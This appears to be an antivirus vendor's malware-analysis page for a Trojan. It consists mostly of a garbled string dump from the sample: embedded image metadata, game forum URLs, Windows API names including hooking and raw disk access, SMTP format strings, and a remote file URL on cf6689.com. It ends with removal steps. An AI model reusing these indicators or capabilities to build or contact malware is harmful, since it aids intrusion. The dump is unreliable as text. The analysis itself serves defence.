xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreateDate="2013-12-31T18:58:24 08:00" xmp:ModifyDate="2014-01-08T04:01:14 08:00" xmp:MetadataDate="2014-01-08T04:01:14 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:88AF9376D677E3119EEEC8EA648F8EDC" xmpMM:DocumentID="xmp.did:87AF9376D677E3119EEEC8EA648F8EDC" xmpMM:OriginalDocumentID="xmp.did:87AF9376D677E3119EEEC8EA648F8EDC"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:87AF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2013-12-31T18:58:24 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:88AF9376D677E3119EEEC8EA648F8EDC" stEvt:when="2014-01-08T04:01:14 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>(7),01444'9=82<.342[.Bu'.Ac'p).KObbs.766.com 766hXXp://bbs.766.com/forum-1596-1.htmldou.tgbus.comhXXp://dou.tgbus.com/forum-382-1.htmlbbs.games.comhXXp://bbs.games.qq.com/f-1001025901-1.htmbbs.houdao.comhXXp://bbs.houdao.com/f142tieba.baidu.com CFhXXp://tieba.baidu.com/f?ie=utf-8&kw=CF/gamebbs.qq.comhXXp://cf.gamebbs.qq.com/forum.php?mod=forumdisplay&fid=308272014:01:06 04:07:28TM%X!" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-05T22:43:27 08:00" xmp:ModifyDate="2014-01-06T04:07:28 08:00" xmp:MetadataDate="2014-01-06T04:07:28 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:40F7C1844376E311856C974B66EA3F54" xmpMM:DocumentID="xmp.did:A6BAA6B31476E3119CD58B70B08143CD" xmpMM:OriginalDocumentID="xmp.did:A6BAA6B31476E3119CD58B70B08143CD"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:A6BAA6B31476E3119CD58B70B08143CD" stEvt:when="2014-01-05T22:43:27 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to application/vnd.adobe.photoshop"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:A7BAA6B31476E3119CD58B70B08143CD" stEvt:when="2014-01-05T23:05:06 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:3FF7C1844376E311856C974B66EA3F54" stEvt:when="2014-01-06T04:07:28 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:40F7C1844376E311856C974B66EA3F54" stEvt:when="2014-01-06T04:07:28 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3FF7C1844376E311856C974B66EA3F54" stRef:documentID="xmp.did:A6BAA6B31476E3119CD58B70B08143CD" stRef:originalDocumentID="xmp.did:A6BAA6B31476E3119CD58B70B08143CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>nK.HTTfw.ky|6_Mu%f%]%up?k.bCk"SI.ddE\.VlPWU%DYZ@.oRI.eHVG%UV3mV~G%SYU$:0hd.tZZ\T.HW>]%U5}\9).WH quwn.Ji%fWu:Pj^%DjQI,E%shAV%F#3=5%Fg5=û#UOA%UWeCMD2%C )Y".HXmv2014:01:02 20:56:16" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:ModifyDate="2014-01-02T20:56:16 08:00" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-02T20:50:17 08:00" xmp:MetadataDate="2014-01-02T20:56:16 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:576F3FD3AA73E311B9C2AE9B5E308CB0" xmpMM:DocumentID="xmp.did:576F3FD3AA73E311B9C2AE9B5E308CB0" xmpMM:OriginalDocumentID="xmp.did:576F3FD3AA73E311B9C2AE9B5E308CB0"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:576F3FD3AA73E311B9C2AE9B5E308CB0" stEvt:when="2014-01-02T20:56:16 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>j"j"h"h&h*h*h.hRhVjDnu-F}kT2014:01:06 04:28:159hXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-12-31T19:09:30 08:00" xmp:ModifyDate="2014-01-06T04:28:15 08:00" xmp:MetadataDate="2014-01-06T04:28:15 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:40C40DE84776E311828FCB540D8D1C45" xmpMM:DocumentID="xmp.did:3FC40DE84776E311828FCB540D8D1C45" xmpMM:OriginalDocumentID="xmp.did:3FC40DE84776E311828FCB540D8D1C45"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:3FC40DE84776E311828FCB540D8D1C45" stEvt:when="2013-12-31T19:09:30 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:40C40DE84776E311828FCB540D8D1C45" stEvt:when="2014-01-06T04:28:15 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>~-k}=7.Oin2014:01:02 20:40:05" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:ModifyDate="2014-01-02T20:40:05 08:00" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-12-31T16:39:33 08:00" xmp:MetadataDate="2014-01-02T20:40:05 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:546F3FD3AA73E311B9C2AE9B5E308CB0" xmpMM:DocumentID="xmp.did:546F3FD3AA73E311B9C2AE9B5E308CB0" xmpMM:OriginalDocumentID="xmp.did:546F3FD3AA73E311B9C2AE9B5E308CB0"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:546F3FD3AA73E311B9C2AE9B5E308CB0" stEvt:when="2014-01-02T20:40:05 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>2014:01:22 10:36:28" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2014-01-22T10:36:28 08:00" xmp:MetadataDate="2014-01-22T10:36:28 08:00" xmp:ModifyDate="2014-01-22T10:36:28 08:00" xmpMM:InstanceID="xmp.iid:49BEB0900D83E3118F62A95604D40DB6" xmpMM:DocumentID="xmp.did:48BEB0900D83E3118F62A95604D40DB6" xmpMM:OriginalDocumentID="xmp.did:48BEB0900D83E3118F62A95604D40DB6" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" dc:format="image/jpeg"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:48BEB0900D83E3118F62A95604D40DB6" stEvt:when="2014-01-22T10:36:28 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:49BEB0900D83E3118F62A95604D40DB6" stEvt:when="2014-01-22T10:36:28 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>xmp.did:9FBAA6B31476E3119CD58B70B08143CD</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>J,u:%DP5.StchklL.SwI%DSV#%4sAE]6/"%u2<W.UAzCrt^Y.Wn 0eb1%fG#Y$9.VQek#/.ofHC,K-$.UUKD\%Xx$EÚaS&.ig)%uc2[M%U#S@/l.LEdux%UXudpQ.cpC#`:l}.jLwW%U;Z.ssa*7YG%u$:ZeXe].ok\}}9y%fwc_.rG;/xu.kyb2.o.ogTu%Duee/.Qohz5=Df9%S%dU-QK]7A}5.HG}zHI.VyC'T}Eß4iÄ3xRB]?:URL)0{web%f],$|9.SR9.QA-A.wsmx"Y%XA.oorE. X.%X.oles%U5.{kVPVUv]%dE ,.Quu%F;#$=U%U<.sqUT_%S62idu%XPL..VqIH.uPiinflate 1.1.3 Copyright 1995-1998 Mark AdlerMSWHEEL_ROLLMSGiphlpapi.dllSHLWAPI.dllMPR.dllVERSION.dll\\.\Scsi0:\\.\PhysicalDrive0<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr><tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr><tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr><tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr><tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr><tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr><tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr><tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr><table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>burlywood\winhlp32.exeVVV.dywt.com.cncode %d bits %d->%dgen_codes: max_code %dbl code -opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %ulast_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)(*.htm;*.html)|*.htm;*.htmlMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)HTTP/1.0%s <%s>Reply-To: %sFrom: %sTo: %sSubject: %sDate: %sCc: %s%a, %d %b %Y %H:%M:%SSMTP1.1.3;3 #>6.&'2, / 0&7!4-)1#%d%d%drundll32.exe shell32.dll,.PAVCOleDispatchException@@.PAVCOleException@@right-curly-bracketleft-curly-bracket0123456789.cf6689.com/inc/gg.txtc:\%original file name%.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.1.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>.bMv^J.VR=wU%7uMcP;R%csbMfj%s'MS%X.Ll#O~B{}%CQw=.AwzK_"!wZ&~%X<Mb.LHN(}E.okG_2C%S.CR%X()iEk8R%u!=-SWi}6J;kD.Qk=L.eZGeZ![%u;x.wOd.KUk) O\!S%%D1em.qwTL.gaX%u."f$)6-Qd.iO$#.fa.XGS$n/ib"n.lIty.WT$t&?Q=.Mg.Xn/!9.ousYTeu.aWXq.HM0[%.u/.ubd n,ml%D.Yv1>QR*b.oY5%X}Qnq.So>uFp.WeNfd.mM.ycT~K!SOAAIu%cm%STclnNe%M.ENXTWK#úR.jV,G_^%FO.nlRRZ%Cvjf.SDQ&.YJi545SW.mL~C6Y.vv%/.Qf19@$1(%f}%U,BZT.SY?:.ZW&BD_%u#:c.QME.Nsy8V.SMgrE.Qd|)Y@FI.ABGetWindowsDirectoryAEnumChildWindowsWININET.dllMSHELL32.dllUnregisterHotKey}%U-r.af%JdR.vf*RegCreateKeyAInternetCrackUrlA%CRL4)'18.1450*4I.umo%uIer%sIt.tj{f;vt.bhdjU.qd`D.rR~r2NVThe procedure entry point %s could not be located in the dynamic link library %sO.LUX.QE_#j|.eOgWQ&%cPZ&,X-#)RA'%C=%S]C!e%u%QfQ%u*InternetCanonicalizeUrlAvJN.vfsftpv.Ocl9$eIfRD%uThe ordinal %u could not be located in the dynamic link library %sE%cIwa%UIEj|ÏB!%Fnbo!2Usb.otb.Mb1Q.cf,5%H5"%CzprUE%X,Wy.hu%u=c~<.NA "Q!.nE@eK=.rm.gLM@LI_Vc4O%U302%(3 %.EpQ:2UrC.iMM%c-aa#XD"].kov.mm!&;!1`}%fF&Au.jX%u7_}"I1vK<#%C'Msggf.WITt0L/$fI%u1%fGFHu.kdK%' \cvgMX%u_T.aAyYd*.Qe:W6'.jW7C.wER(1%X:B{'_107$;lDv.Yis%cIU.FD!*M.GiV\JqQ%UF#úS"%u)ZÚ>`,%Xnol.BQSftpvso%cIIO3E2_%uIB.DNc95JRCdqSe#.Ea/8%9s5!cdeghijklmno.qr%.s3%6$GyES%2U!:!.qr@W%XIYsb%dlQwTM.uojD"N%UP%d%Y)}.sUN^]a.BEc%S%9`bcM1a.OcRl9fQR%u;'(.Hng3s.uTw\NjO*%SZ::-.EBey%fgl21G%C"mV%CMP^.aa`%u2>1-B2.Kbok?.tIzoc.Mbohv?D%clzgA_0jõG.fwss*%x5U* 56789:e%dMcia.ZY3v :;I.JKgeXEz%F.E1.JCa"IO.Ri1lxgOB%srMFP5%x-n.CE$%s9AKRX.bq=!%SysRA.FE.Eus/&eGS.gC5NS%Fk\.ci~hN%f-.MFhrJQB%d.gXhT.OW;zwW.nd pz=.gIpbJ.fELz%F.E15O.RiaP6=l%fFP5%xwL&`X%U0%5s/hg.Rv\%s9AK=A%SyswG?s)8TcPY%SJq'tIN0%Xu&9UV6?.ZawW.ndp@z=s&'()* 56P!H%s7.ws(sbK*/QT%f%2E9D%SU<s.ulw@I.oln]G%Se.bUao#%K.NFU11%X3e%.wu=|q.NZ.mo!vK.Vn?/UY%SZ.nB@u= V!J%UzP.he~o? Af.FVeF.SH 6<%ux>.pd\*{d.kSyJÏH|y/.xoSJ.nmr.TuP`vHq%CMFsD%U0`!Dw8.LNO%F!;(^z-.lY>.wAAG%sJ*R--.dZv?G]%S-P_A.to6.CXSZYQz*%seV.RL^8H.IG]t.gP4TD.HNaAQ&.yFSD.FNQu^L%fm.Yc9z>DFTP{%XwM<.Fqj`H.LA>.vG,1H=#%S.psj%c~%SITeq%s#)"8%c.HaYLPRegisterHotKeyRASAPI32.dlly-Q}9coledlg.dll(*.*)1.0.0.01, 0, 6, 6- Skin.dll2.5.2.9%original file name%.exe_3832_rwx_0093B000_00001000:
ScaleViewportExtExOLEAUT32.dllWININET.dllJHw2.Hw%original file name%.exe_3832_rwx_0093F000_00001000:
KERNEL32.dll%original file name%.exe_3832_rwx_0095D000_00001000:
WINSPOOL.DRVWS2_32.dll%original file name%.exe_3832_rwx_10001000_00039000:
L$(h%fSSh0jGw2.Hwmsctls_hotkey32TVCLHotKeyTHotKey\skinh.she}uo,x6l5k%x-l h9p%s m)t4`#be"m?c&y1`Ð<SetViewportOrgExSetViewportExtExSetWindowsHookExAUnhookWindowsHookExEnumThreadWindowsEnumChildWindows`c%US.4/!#$<#$#=.text`.rdata@.data.rsrc@.UPX0`.UPX1`.reloc
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\jedata.dll (178 bytes)
C:\Ƥ·ô.she (7 bytes)- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.